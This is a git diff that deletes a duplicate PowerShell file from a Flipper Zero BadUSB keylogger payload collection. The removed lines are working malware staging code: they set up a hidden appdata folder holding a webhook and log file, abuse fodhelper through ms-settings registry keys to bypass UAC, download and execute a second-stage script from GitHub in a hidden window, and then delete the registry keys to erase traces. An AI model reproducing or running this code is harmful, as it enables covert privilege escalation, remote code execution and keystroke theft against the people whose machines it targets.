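--- a/Payloads/Flip-Keylogger/keylogger - Copy.ps1
+++ b/Payloads/Flip-Keylogger/keylogger - Copy.ps1
@@ -1,20 +0,0 @@
-if (![System.IO.Directory]::Exists("$env:appdata\-locker")){New-Item -ItemType Directory -Force -Path "$env:appdata\-locker"};
-echo $dc > "$env:appdata\-locker\wh.txt";
-echo $log > "$env:appdata\-locker\log.txt";
-echo $ks > "$env:appdata\-locker\killswitch.txt";
-
-function s1 {
-$user = "$env:COMPUTERNAME\$env:USERNAME"
-$isAdmin = (Get-LocalGroupMember 'Administrators').Name -contains $user
-if($isAdmin){
-$259="powershell.exe -w h iwr https://raw.githubusercontent.com/I-Am-Jakoby/Flipper-Zero-BadUSB/main/Payloads/Flip-Keylogger/s2.ps1 | iex";
-reg add "HKCU\Software\Classes\.259\Shell\Open\command" /d $259 /f;reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".259" /f;fodhelper.exe;Start-Sleep -s 3;reg delete "HKCU\Software\Classes\.259\" /f;reg delete "HKCU\Software\Classes\ms-settings\" /f;
-
-}
-else{
-Break
-}
-}
-
-s1
-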